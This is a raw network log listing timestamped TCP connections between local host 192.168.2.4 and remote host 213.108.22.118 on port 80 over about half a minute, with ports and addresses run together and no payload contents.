                                        Nov 30, 2024 22:37:35.638349056 CET4996080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:35.807265043 CET8049960213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:35.933634043 CET4995880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:35.933799982 CET4996080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:35.934067965 CET4996480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:36.189521074 CET8049964213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:36.189538956 CET8049958213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:36.189551115 CET8049960213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:36.189645052 CET4995880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:36.189645052 CET4996480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:36.189723969 CET4996080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:36.189996004 CET4996480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:36.313519001 CET8049964213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:36.573163986 CET4996480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:36.693173885 CET8049964213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:36.693186045 CET8049964213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:36.693265915 CET8049964213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:37.592238903 CET8049964213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:37.684614897 CET4996480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:37.844475985 CET8049964213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:37.844742060 CET4996480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:37.964396000 CET4996980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:37.965070963 CET8049964213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:37.965275049 CET4996480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:38.084472895 CET8049969213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:38.088598013 CET4996980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:38.088835955 CET4996980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:38.208746910 CET8049969213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:38.436404943 CET4996980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:38.556515932 CET8049969213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:38.556525946 CET8049969213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:38.556586981 CET8049969213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:39.518942118 CET8049969213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:39.638355970 CET4996980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:39.753978014 CET8049969213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:39.827353001 CET4996980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:39.936393023 CET4996980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:39.940193892 CET4997480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.056910038 CET8049969213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.057115078 CET4996980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.060169935 CET8049974213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.060287952 CET4997480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.060707092 CET4997480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.183698893 CET8049974213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.419713974 CET4997480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.539712906 CET8049974213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.539720058 CET8049974213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.539784908 CET8049974213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.576829910 CET4997780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.577564955 CET4997480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.696945906 CET8049977213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.697096109 CET4997780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.697290897 CET4997780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.708201885 CET4997980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.742252111 CET8049974213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.817257881 CET8049977213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.828085899 CET8049979213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:40.828169107 CET4997980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.828387976 CET4997980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:40.948251963 CET8049979213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:41.044842958 CET4997780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:41.105540037 CET8049974213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:41.105592012 CET4997480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:41.164855003 CET8049977213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:41.164921045 CET8049977213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:41.185400963 CET4997980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:41.305532932 CET8049979213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:41.305594921 CET8049979213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:41.305624008 CET8049979213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:42.098406076 CET8049977213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:42.139044046 CET8049979213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:42.266624928 CET4997980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.326420069 CET4997780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.352291107 CET8049977213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:42.373987913 CET8049979213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:42.436467886 CET4997780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.452280998 CET4997980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.627163887 CET4997780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.627372980 CET4997980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.628215075 CET4998480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.747407913 CET8049977213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:42.747852087 CET8049979213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:42.747977972 CET4997780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.748065948 CET8049984213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:42.748141050 CET4997980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.748142004 CET4998480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.751760960 CET4998480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:42.871634960 CET8049984213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:43.107196093 CET4998480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:43.227649927 CET8049984213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:43.227663994 CET8049984213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:43.227710009 CET8049984213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:44.074878931 CET8049984213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:44.138545036 CET4998480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:44.319421053 CET8049984213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:44.436413050 CET4998480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:44.449290991 CET4998480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:44.449716091 CET4998880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:44.569456100 CET8049984213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:44.569525003 CET4998480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:44.569562912 CET8049988213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:44.569657087 CET4998880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:44.569852114 CET4998880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:44.689693928 CET8049988213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:44.920974016 CET4998880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:45.042336941 CET8049988213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:45.042362928 CET8049988213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:45.042398930 CET8049988213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:46.006258965 CET8049988213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:46.062546015 CET4998880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:46.252747059 CET8049988213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:46.357259989 CET4998880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:46.375098944 CET4998880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:46.375098944 CET4999480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:46.497395992 CET8049994213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:46.497411966 CET8049988213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:46.497487068 CET4998880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:46.497504950 CET4999480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:46.497916937 CET4999480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:46.617791891 CET8049994213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:46.857460976 CET4999480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:46.977529049 CET8049994213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:46.977540970 CET8049994213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:46.977554083 CET8049994213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.358017921 CET4999480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.358395100 CET4999980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.478419065 CET8049999213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.478532076 CET4999980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.478658915 CET4999980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.484276056 CET5000080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.518392086 CET8049994213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.551104069 CET8049994213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.551258087 CET4999480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.598603964 CET8049999213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.604275942 CET8050000213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.604509115 CET5000080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.604790926 CET5000080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.725092888 CET8050000213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.826468945 CET4999980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:47.946477890 CET8049999213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.946747065 CET8049999213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:47.951105118 CET5000080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:48.072180033 CET8050000213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:48.072197914 CET8050000213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:48.072217941 CET8050000213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:48.869946003 CET8049999213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:48.916776896 CET4999980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.045175076 CET8050000213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.102288008 CET8049999213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.189184904 CET5000080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.189251900 CET4999980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.287467957 CET8050000213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.405517101 CET4999980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.405608892 CET5000080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.405715942 CET5000380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.525638103 CET8050003213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.525793076 CET5000380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.525823116 CET8049999213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.525924921 CET5000380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.525928020 CET4999980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.526217937 CET8050000213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.526480913 CET5000080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.645899057 CET8050003213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.876483917 CET5000380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:49.996567011 CET8050003213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.996581078 CET8050003213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:49.996592999 CET8050003213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:50.955735922 CET8050003213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:51.060334921 CET5000380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:51.199649096 CET8050003213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:51.231000900 CET5000380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:51.351361990 CET8050003213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:51.351444960 CET5000380192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:51.517710924 CET5000880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:51.638021946 CET8050008213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:51.640522003 CET5000880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:51.672808886 CET5000880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:51.792748928 CET8050008213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:52.029144049 CET5000880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:52.149213076 CET8050008213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:52.149228096 CET8050008213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:52.149338961 CET8050008213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:53.040769100 CET8050008213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:53.247828960 CET5000880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:53.292538881 CET8050008213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:53.357199907 CET5000880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:53.417958021 CET5000880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:53.420460939 CET5001480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:53.538273096 CET8050008213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:53.538320065 CET5000880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:53.540491104 CET8050014213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:53.540565968 CET5001480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:53.540760994 CET5001480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:53.664499998 CET8050014213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:53.889686108 CET5001480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:54.009767056 CET8050014213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:54.009780884 CET8050014213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:54.009907961 CET8050014213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:54.126482964 CET5001780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:54.238957882 CET5001480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:54.246462107 CET8050017213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:54.246834993 CET5001780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:54.252049923 CET5001780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:54.372118950 CET8050017213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:54.406256914 CET8050014213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:54.584578037 CET8050014213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:54.586738110 CET5001480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:54.607353926 CET5001780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:54.781487942 CET5002080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:54.800815105 CET8050017213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:54.800832987 CET8050017213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:55.043009996 CET8050020213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:55.043081999 CET5002080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:55.043255091 CET5002080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:55.163286924 CET8050020213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:55.388602972 CET5002080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:55.508996964 CET8050020213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:55.509011984 CET8050020213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:55.509023905 CET8050020213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:55.672350883 CET8050017213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:55.778592110 CET5001780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:55.924717903 CET8050017213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:56.034328938 CET5001780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:56.670649052 CET8050020213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:56.792504072 CET5002680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:56.792504072 CET5001780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:56.792503119 CET5002080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:56.912586927 CET8050026213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:56.912801981 CET5002680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:56.913024902 CET8050020213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:56.913589001 CET5002680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:56.913619041 CET5002080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:56.913758039 CET8050017213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:56.913937092 CET5001780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:57.033473969 CET8050026213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:57.265539885 CET5002680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:57.385531902 CET8050026213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:57.385556936 CET8050026213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:57.385567904 CET8050026213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:58.401556015 CET8050026213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:58.560519934 CET5002680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:58.652713060 CET8050026213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:58.732780933 CET5002680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:58.777616978 CET5003080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:58.897635937 CET8050030213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:58.897722960 CET5003080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:58.897917032 CET5003080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:59.018138885 CET8050030213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:59.247997046 CET5003080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:37:59.368000984 CET8050030213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:59.368019104 CET8050030213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:37:59.368031025 CET8050030213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:00.293981075 CET8050030213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:00.341656923 CET5003080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.548609018 CET8050030213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:00.640571117 CET5003080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.736180067 CET5003580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.736305952 CET5003080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.856131077 CET8050035213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:00.856282949 CET5003580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.856451035 CET8050030213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:00.856471062 CET5003580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.856534958 CET5003080192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.936506033 CET5003580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.936825037 CET5003780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:00.976496935 CET8050035213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.056792021 CET8050037213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.056929111 CET5003780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:01.058312893 CET5002680192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:01.058532953 CET5003780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:01.060905933 CET5003880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:01.098484993 CET8050035213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.178556919 CET8050037213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.180802107 CET8050038213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.180900097 CET5003880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:01.181132078 CET5003880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:01.300949097 CET8050038213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.404828072 CET5003780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:01.525032997 CET8050037213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.525130033 CET8050037213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.529679060 CET5003880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:01.649780035 CET8050038213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.649801970 CET8050038213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.649826050 CET8050038213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.902188063 CET8050035213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:01.902265072 CET5003580192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:02.477922916 CET8050037213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:02.560596943 CET5003780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:02.728805065 CET8050037213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:02.745978117 CET8050038213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:02.857275963 CET5003880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:02.857274055 CET5003780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:02.886394024 CET5003880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:02.886399984 CET5004280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:02.887260914 CET5003780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:03.006586075 CET8050042213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:03.006730080 CET5004280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:03.006840944 CET8050038213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:03.006900072 CET5004280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:03.006953001 CET5003880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:03.007349968 CET8050037213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:03.007805109 CET5003780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:03.126810074 CET8050042213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:03.360600948 CET5004280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:03.480717897 CET8050042213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:03.480777979 CET8050042213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:03.480840921 CET8050042213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:04.385816097 CET8050042213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:04.435405016 CET5004280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:04.621757984 CET8050042213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:04.732357979 CET5004280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:04.746155024 CET5004880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:04.746155024 CET5004280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:04.866106033 CET8050048213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:04.866457939 CET8050042213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:04.866638899 CET5004880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:04.866638899 CET5004280192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:04.866838932 CET5004880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:04.986830950 CET8050048213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:05.216873884 CET5004880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:05.507251978 CET8050048213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:05.507266998 CET8050048213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:05.507277966 CET8050048213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:06.319633007 CET8050048213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:06.560429096 CET5004880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:06.563534975 CET8050048213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:06.738651991 CET5004880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:06.738899946 CET5005480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:06.858863115 CET8050054213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:06.858963013 CET5005480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:06.858980894 CET8050048213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:06.859059095 CET5004880192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:06.859503031 CET5005480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:06.979460955 CET8050054213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:07.217067003 CET5005480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:07.337236881 CET8050054213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:07.337274075 CET8050054213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:07.337323904 CET8050054213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:07.733104944 CET5005780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:07.733220100 CET5005480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:07.853138924 CET8050057213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:07.853208065 CET5005780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:07.854696035 CET5005780192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:07.856939077 CET5005980192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:07.894360065 CET8050054213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:07.895519018 CET8050054213.108.22.118192.168.2.4
                                        Nov 30, 2024 22:38:07.895587921 CET5005480192.168.2.4213.108.22.118
                                        Nov 30, 2024 22:38:07.974566936 CET8050057213.108.22.118192.168.2.4
